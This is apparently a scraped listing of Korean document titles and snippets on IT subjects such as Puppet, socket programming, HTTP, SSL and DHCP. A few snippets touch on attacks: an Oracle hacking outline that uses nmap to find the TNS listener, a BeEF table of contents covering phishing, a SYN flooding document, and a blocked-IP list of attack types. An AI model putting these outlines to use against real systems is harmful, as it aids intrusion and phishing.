KTH 자동화툴검토보고서 Puppet 2012-09-07 본문서는 INFRA 자동화 (Automation) Tool 의하나인 Puppet 에대하여검토한보고서임. Puppet labs 의내용을근간으로함. 내용 1. Puppet 이란무엇인가?... 2 2. Puppet 어떻게동작하는가?... 3 3. 재사용구성모듈정의... 4 4. 원하는상태적용... 5 첨부
More informationEclipse 와 Firefox 를이용한 Javascript 개발 발표자 : 문경대 11 년 10 월 26 일수요일
Eclipse 와 Firefox 를이용한 Javascript 개발 발표자 : 문경대 Introduce Me!!! Job Jeju National University Student Ubuntu Korean Jeju Community Owner E-Mail: ned3y2k@hanmail.net Blog: http://ned3y2k.wo.tc Facebook: http://www.facebook.com/gyeongdae
More informationPowerPoint 프레젠테이션
Network Programming Jo, Heeseung Network 실습 네트워크프로그래밍 멀리떨어져있는호스트들이서로데이터를주고받을수있도록프로그램을구현하는것 파일과는달리데이터를주고받을대상이멀리떨어져있기때문에소프트웨어차원에서호스트들간에연결을해주는장치가필요 이러한기능을해주는장치로소켓이라는인터페이스를많이사용 소켓프로그래밍이란용어와네트워크프로그래밍이랑용어가같은의미로사용
More information게시판 스팸 실시간 차단 시스템
오픈 API 2014. 11-1 - 목 차 1. 스팸지수측정요청프로토콜 3 1.1 스팸지수측정요청프로토콜개요 3 1.2 스팸지수측정요청방법 3 2. 게시판스팸차단도구오픈 API 활용 5 2.1 PHP 5 2.1.1 차단도구오픈 API 적용방법 5 2.1.2 차단도구오픈 API 스팸지수측정요청 5 2.1.3 차단도구오픈 API 스팸지수측정결과값 5 2.2 JSP
More informationRHEV 2.2 인증서 만료 확인 및 갱신
2018/09/28 03:56 1/2 목차... 1 인증서 확인... 1 인증서 종류와 확인... 4 RHEVM CA... 5 FQDN 개인 인증서... 5 레드햇 인증서 - 코드 서명 인증서... 6 호스트 인증... 7 참고사항... 8 관련링크... 8 AllThatLinux! - http://allthatlinux.com/dokuwiki/ rhev_2.2_
More information0. 들어가기 전
컴퓨터네트워크 14 장. 웹 (WWW) (3) - HTTP 1 이번시간의학습목표 HTTP 의요청 / 응답메시지의구조와동작원리이해 2 요청과응답 (1) HTTP (HyperText Transfer Protocol) 웹브라우저는 URL 을이용원하는자원표현 HTTP 메소드 (method) 를이용하여데이터를요청 (GET) 하거나, 회신 (POST) 요청과응답 요청
More informationìœ€íŁ´IP( _0219).xlsx
차단 IP 국적 공격유형 목적지포트 IPS 룰 180.97.215.45 중국 서비스취약점공격 TCP/5555 (0001)SYN Port Scan 222.186.42.248 중국 서비스취약점공격 TCP/80 (0001)SYN Port Scan 104.236.178.166 미국 웹해킹 TCP/80 (5010)HEAD / HTTP (Http server buffer
More informationBEA_WebLogic.hwp
BEA WebLogic Server SSL 설정방법 - Ver 1.0-2008. 6 개정이력 버전개정일개정내용 Ver 1.0 2008 년 6 월 BEA WebLogic Server SSL 설명서최초작성 본문서는정보통신부 한국정보보호진흥원의 보안서버구축가이드 를참고하여작성되었습니다. 본문서내용의무단도용및사용을금합니다. < 목차 > 1. 개인키및 CSR 생성방법
More informationDocsPin_Korean.pages
Unity Localize Script Service, Page 1 Unity Localize Script Service Introduction Application Game. Unity. Google Drive Unity.. Application Game. -? ( ) -? -?.. 준비사항 Google Drive. Google Drive.,.. - Google
More informationnew Spinbackup ICO White Paper(ko)
1.... 4 2.... 4 3. ICO... 5 4.... 7 4.1... 7 4.2... 8 4.3... 10 4.4?... 11 4.6... 12 5. SAAS... 13 5.1 (SINGLE SIGN ON)... 13 5.1.1... 14 5.1.2... 15 5.1.3 (Google)... 15 5.1.4... 16 5.1.5 (Spinbackup)...
More informationMicrosoft PowerPoint - L4-7Switch기본교육자료.ppt
L4-7 Switch 기본교육자료 Pumpkin Networks. Inc. http://www.pumpkinnet.co.kr (Tel) 02-3280-9380 (Fax) 02-3280-9382 info@pumpkinnet.co.kr 기본개념 L4/L7 Switch 란? -2- 기본개념 - Switching & Routing Switching & Routing
More informationMicrosoft PowerPoint - ch09 - 연결형리스트, Stack, Queue와 응용 pm0100
2015-1 프로그래밍언어 9. 연결형리스트, Stack, Queue 2015 년 5 월 4 일 교수김영탁 영남대학교공과대학정보통신공학과 (Tel : +82-53-810-2497; Fax : +82-53-810-4742 http://antl.yu.ac.kr/; E-mail : ytkim@yu.ac.kr) 연결리스트 (Linked List) 연결리스트연산 Stack
More informationPWR PWR HDD HDD USB USB Quick Network Setup Guide xdsl/cable Modem PC DVR 1~3 1.. DVR DVR IP xdsl Cable xdsl Cable PC PC DDNS (
PWR PWR HDD HDD USB USB Quick Network Setup Guide xdsl/cable Modem PC DVR 1~3 1.. DVR DVR IP xdsl Cable xdsl Cable PC PC DDNS (http://ddns.hanwha-security.com) Step 1~5. Step, PC, DVR Step 1. Cable Step
More informationvi 사용법
네트워크프로그래밍 6 장과제샘플코드 - 1:1 채팅 (udp 버전 ) 과제 서버에서먼저 bind 하고그포트를다른사람에게알려줄것 클라이언트에서알려준포트로접속 서로간에키보드입력을받아상대방에게메시지전송 2 Makefile 1 SRC_DIR =../../common 2 COM_OBJS = $(SRC_DIR)/addressUtility.o $(SRC_DIR)/dieWithMessage.o
More informationSMB_ICMP_UDP(huichang).PDF
SMB(Server Message Block) UDP(User Datagram Protocol) ICMP(Internet Control Message Protocol) SMB (Server Message Block) SMB? : Microsoft IBM, Intel,. Unix NFS. SMB client/server. Client server request
More informationo o o 8.2.1. Host Error 8.2.2. Message Error 8.2.3. Recipient Error 8.2.4. Error 8.2.5. Host 8.5.1. Rule 8.5.2. Error 8.5.3. Retry Rule 8.11.1. Intermittently
More information제20회_해킹방지워크샵_(이재석)
IoT DDoS DNS (jaeseog@sherpain.net) (www.sherpain.net) DDoS DNS DDoS / DDoS(Distributed DoS)? B Asia Broadband B Bots connect to a C&C to create an overlay network (botnet) C&C Provider JP Corp. Bye Bye!
More information슬라이드 1
DHCP (Dynamic Host Configuration Protocol) Oct 2006 Technical Support Div. Tel : 031-739-6800 Mail : support@corecess.com DHCP Motivations Automatic network configuration for clients No administrator intervention
More information10-2 삼각형의닮음조건 p270 AD BE C ABC DE ABC 중 2 비상 10, 11 단원도형의닮음 (& 활용 ) - 2 -
10 단원 : 도형의닮음 10-1 닮음도형 p265 ABC DEF ABC DEF EF B ABCD EFGH ABCD EFGH EF A AB GH ADFC CF KL 중 2 비상 10, 11 단원도형의닮음 (& 활용 ) - 1 - 10-2 삼각형의닮음조건 p270 AD BE C ABC DE ABC 중 2 비상 10, 11 단원도형의닮음 (& 활용 ) - 2 -
More information<%DOC NAME%> User Manual
AVG AntiVirus 2013 사용자 설명서 문서 버전 2013.11 ( 14.2.2013.) Copy right AV G Tec hnologies CZ, s.r.o. All rights res erv ed. 다른 모든 상표는 해당 소유자의 재산입니다. 이 제품은 RSA Data Sec urity, Inc. MD5 Mes s age- Diges t Algorithm,
More informationSYN flooding
Hacking & Security Frontier SecurityFirst SYN flooding - SYN flooding 공격의원리와코드그리고대응 by amur, myusgun, leemeca 2008. 09. myusgun Agenda 개요...3 원리...3 위협...4 잠깐! - 문서에관하여...4 이문서는...4 Code...4 대응방안...4 소스코드...5
More information2009년 상반기 사업계획
소켓프로그래밍활용 IT CookBook, 유닉스시스템프로그래밍 학습목표 소켓인터페이스를활용한다양한프로그램을작성할수있다. 2/23 목차 TCP 기반프로그래밍 반복서버 동시동작서버 동시동작서버-exec함수사용하기 동시동작서버-명령행인자로소켓기술자전달하기 UDP 프로그래밍 3/23 TCP 기반프로그래밍 반복서버 데몬프로세스가직접모든클라이언트의요청을차례로처리 동시동작서버
More informationServer Agent Guide
Server Agent Guide WhaTap Support Version 1.0.1 Table of Contents Server Agent Guide......................................................................................... 1 1. 개요.................................................................................................
More informationObservational Determinism for Concurrent Program Security
웹응용프로그램보안취약성 분석기구현 소프트웨어무결점센터 Workshop 2010. 8. 25 한국항공대학교, 안준선 1 소개 관련연구 Outline Input Validation Vulnerability 연구내용 Abstract Domain for Input Validation Implementation of Vulnerability Analyzer 기존연구
More informationPowerPoint 프레젠테이션
KeyPad Device Control - Device driver Jo, Heeseung HBE-SM5-S4210 에는 16 개의 Tack Switch 를사용하여 4 행 4 열의 Keypad 가장착 4x4 Keypad 2 KeyPad 를제어하기위하여 FPGA 내부에 KeyPad controller 가구현 KeyPad controller 16bit 로구성된
More information본문서는 초급자들을 대상으로 최대한 쉽게 작성하였습니다. 본문서에서는 설치방법만 기술했으며 자세한 설정방법은 검색을 통하시기 바랍니다. 1. 설치개요 워드프레스는 블로그 형태의 홈페이지를 빠르게 만들수 있게 해 주는 프로그램입니다. 다양한 기능을 하는 플러그인과 디자인
스마일서브 CLOUD_Virtual 워드프레스 설치 (WORDPRESS INSTALL) 스마일서브 가상화사업본부 Update. 2012. 09. 04. 본문서는 초급자들을 대상으로 최대한 쉽게 작성하였습니다. 본문서에서는 설치방법만 기술했으며 자세한 설정방법은 검색을 통하시기 바랍니다. 1. 설치개요 워드프레스는 블로그 형태의 홈페이지를 빠르게 만들수 있게
More information초보자를 위한 ASP.NET 21일 완성
ASP.NET 21!!.! 21 ( day 2 ), Active Server Pages.NET (Web-based program -ming framework).,... ASP.NET. ASP. NET Active Server Pages ( ASP ),. ASP.NET,, ( ),.,.,, ASP.NET.? ASP.NET.. (, ).,. HTML. 24 ASP.
More informationOracle hacking 작성자 : 임동현 작성일 2008 년 10 월 11 일 ~ 2008 년 10 월 19 일 신규작성 작성내용
Oracle hacking 작성자 : 임동현 (ddongsbrk@naver.com) 작성일 2008 년 10 월 11 일 ~ 2008 년 10 월 19 일 신규작성 작성내용 Skill List 1. Oracle For Pentest 1. Find TNS Listener (Default 1521 port) (with nmap or amap) 2. Get the
More information4. #include <stdio.h> #include <stdlib.h> int main() { functiona(); } void functiona() { printf("hihi\n"); } warning: conflicting types for functiona
이름 : 학번 : A. True or False: 각각항목마다 True 인지 False 인지적으세요. 1. (Python:) randint 함수를사용하려면, random 모듈을 import 해야한다. 2. (Python:) '' (single quote) 는한글자를표현할때, (double quote) 는문자열을표현할때사용한다. B. 다음에러를수정하는방법을적으세요.
More informationBEef 사용법.pages
1.... 3 2.... 3 (1)... 3 (2)... 5 3. BeEF... 7 (1) BeEF... 7 (2)... 8 (3) (Google Phishing)... 10 4. ( )... 13 (1)... 14 (2) Social Engineering... 17 (3)... 19 (4)... 21 5.... 22 (1)... 22 (2)... 27 (3)
More informationMicrosoft PowerPoint - chap07.ppt
2010-1학기 현대암호학 제Ⅱ부인증 박종혁 Tel: 970-6702 Email: jhpark1@snut.ac.kr 제7장일방향 해시 함수 목차 일방향 해시 함수 일방향 해시 함수의 응용 예 일방향 해시 함수의 예 일방향해시함수SHA-1 (512) 일방향 해시 함수로 해결할 수 없는 문제 7.0 주요 내용 범죄 수사에서는 지문을 이용하는 일이 있다. 특정인의
More information저작자표시 - 비영리 - 변경금지 2.0 대한민국 이용자는아래의조건을따르는경우에한하여자유롭게 이저작물을복제, 배포, 전송, 전시, 공연및방송할수있습니다. 다음과같은조건을따라야합니다 : 저작자표시. 귀하는원저작자를표시하여야합니다. 비영리. 귀하는이저작물을영리목적으로이용할
저작자표시 - 비영리 - 변경금지 2.0 대한민국 이용자는아래의조건을따르는경우에한하여자유롭게 이저작물을복제, 배포, 전송, 전시, 공연및방송할수있습니다. 다음과같은조건을따라야합니다 : 저작자표시. 귀하는원저작자를표시하여야합니다. 비영리. 귀하는이저작물을영리목적으로이용할수없습니다. 변경금지. 귀하는이저작물을개작, 변형또는가공할수없습니다. 귀하는, 이저작물의재이용이나배포의경우,
More informationPowerPoint 프레젠테이션
Install the PDI on CentOS 2013.04 G L O B E P O I N T 1 Ⅰ linux 구성 II Pentaho Install 2013, Globepoint Inc. All Rights Reserved. 2 I. Linux 구성 2013, Globepoint Inc. All Rights Reserved. 3 IP 설정 1. 설정파일
More information원격명령실행취약점대응방안권고 ( 금 ) / KISA 취약점분석팀 ( 화 ) 취약점분석및확인방법, 공격유형, FAQ 추가 개요 년 월 일 에의해발견된 의취약점내용이공개됨 쉘 (Shell) : 사용자가입력한문장을해석하여시스템기능을수행하는
원격명령실행취약점대응방안권고 14. 09. 26( 금 ) / KISA 취약점분석팀 14. 09. 30( 화 ) 취약점분석및확인방법, 공격유형, FAQ 추가 개요 년 월 일 에의해발견된 의취약점내용이공개됨 쉘 (Shell) : 사용자가입력한문장을해석하여시스템기능을수행하는명령어해석기 쉘이환경변수를처리하는과정에서취약점이발생하여공격자는시스템의보안을우회하여쉘명령어를실행할수있음
More informationTTA Journal No.157_서체변경.indd
표준 시험인증 기술 동향 FIDO(Fast IDentity Online) 생체 인증 기술 표준화 동향 이동기 TTA 모바일응용서비스 프로젝트그룹(PG910) 의장 SK텔레콤 NIC 담당 매니저 76 l 2015 01/02 PASSWORDLESS EXPERIENCE (UAF standards) ONLINE AUTH REQUEST LOCAL DEVICE AUTH
More information(001~007)수능기적(적통)부속
0 6 06. C : k d=k+c k «+-, : «d= «± +C + =- : d=: ;[!; d=l +C : kf()d=k: f()d k : { f()+g()} d=: f()d+: g()d : { f()-g()} d=: f()d-: g()d : si d=-cos +C : cos d=si+c 008 : sec d=ta +C : cosec d=-cot +C
More information<4D F736F F F696E74202D20C6AEB7A2315F33335FC7C3B6F3C0CCC7CFC0CC20B1E8B1E2BFB5B4EBC7A55F BFCFC0FCC1A4BAB95F E >
HTTPS 완전정복 김기영 / Founder and CEO kiyoung.kim@flyhigh-x.com FlyHigh Co., LTD. / 주식회사플라이하이 이미오래전부터했어야하지만 정책적으로이미정해진일정 FlyHigh Co., Ltd all rights reserved. 2 어떻게하면웹을안전하게구축하고식별할까? 적어도고객을위한서비스를하려고한다면제대로해야한다.
More informationThe Pocket Guide to TCP/IP Sockets: C Version
얇지만얇지않은 TCP/IP 소켓프로그래밍 C 2 판 4 장 UDP 소켓 제 4 장 UDP 소켓 4.1 UDP 클라이언트 4.2 UDP 서버 4.3 UDP 소켓을이용한데이터송싞및수싞 4.4 UDP 소켓의연결 UDP 소켓의특징 UDP 소켓의특성 싞뢰할수없는데이터젂송방식 목적지에정확하게젂송된다는보장이없음. 별도의처리필요 비연결지향적, 순서바뀌는것이가능 흐름제어 (flow
More information일반적인 네트워크의 구성은 다음과 같다
W5200 Errata Sheet Document History Ver 1.0.0 (Feb. 23, 2012) First release (erratum 1) Ver 1.0.1 (Mar. 28, 2012) Add a solution for erratum 1, 2 Ver 1.0.2 (Apr. 03, 2012) Add a solution for erratum 3
More informationT100MD+
User s Manual 100% ) ( x b a a + 1 RX+ TX+ DTR GND TX+ RX+ DTR GND RX+ TX+ DTR GND DSR RX+ TX+ DTR GND DSR [ DCE TYPE ] [ DCE TYPE ] RS232 Format Baud 1 T100MD+
More informationStruxureWare Data Center Expert 7.2.x 의 새 기능 StruxureWare Data Center Expert 7.2.x 릴리스에서 사용할 수 있는 새 기능에 대해 자세히 알아보십시오. 웹 클라이언트 시작 화면: StruxureWare Cen
Online Help StruxureWare Data Center Expert Version 7.2.4 StruxureWare Data Center Expert 7.2.x 의 새 기능 StruxureWare Data Center Expert 7.2.x 릴리스에서 사용할 수 있는 새 기능에 대해 자세히 알아보십시오. 웹 클라이언트 시작 화면: StruxureWare
More informationcam_IG.book
설치 안내서 AXIS P3301 고정형 돔 네트워크 카메라 AXIS P3301-V 고정형 돔 네트워크 카메라 한국어 AXIS P3304 고정형 돔 네트워크 카메라 AXIS P3304-V 고정형 돔 네트워크 카메라 문서 정보 본 문서에는 사용자 네트워크에 AXIS P3301/P3304 고정형 돔 네트워크 카메라를 설치하는 방법에 대 한 지침이 포함되어 있습니다.
More information(01-16)유형아작중1-2_스피드.ps
01 p.10 0001 000 61 0003 4 8 3 4 5 7 4 3 3 3 6 8 9 5 1 1 3 7 9 6 0 1 0004 4 0005 0006 3 0007 6 0008 30 0009 3 19 0010 10 ~14 14 ~18 9 18 ~1 11 1 ~16 4 16 ~0 4 30 0011 160 cm 170 cm 001 10 cm 5 0013 135
More informationUser Guide
HP Pocket Playlist 사용 설명서 부품 번호: 699916-AD2 제 2 판: 2013 년 1 월, 초판: 2012 년 12 월 Copyright 2012, 2013 Hewlett-Packard Development Company, L.P. Microsoft, Windows 및 Windows Vista 는 Microsoft Corporation
More informationMAX+plus II Getting Started - 무작정따라하기
무작정 따라하기 2001 10 4 / Version 20-2 0 MAX+plus II Digital, Schematic Capture MAX+plus II, IC, CPLD FPGA (Logic) ALTERA PLD FLEX10K Series EPF10K10QC208-4 MAX+plus II Project, Schematic, Design Compilation,
More information특허청구의 범위 청구항 1 앵커(20)를 이용한 옹벽 시공에 사용되는 옹벽패널에 있어서, 단위패널형태의 판 형태로 구성되며, 내부 중앙부가 후방 하부를 향해 기울어지도록 돌출 형성되어, 전면이 오 목하게 들어가고 후면이 돌출된 결속부(11)를 형성하되, 이 결속부(11
(51) Int. Cl. (19) 대한민국특허청(KR) (12) 등록특허공보(B1) E02D 29/02 (2006.01) E02D 17/20 (2006.01) E02B 3/14 (2006.01) (21) 출원번호 10-2010-0089517 (22) 출원일자 2010년09월13일 심사청구일자 (56) 선행기술조사문헌 JP2006037700 A* KR100920461
More information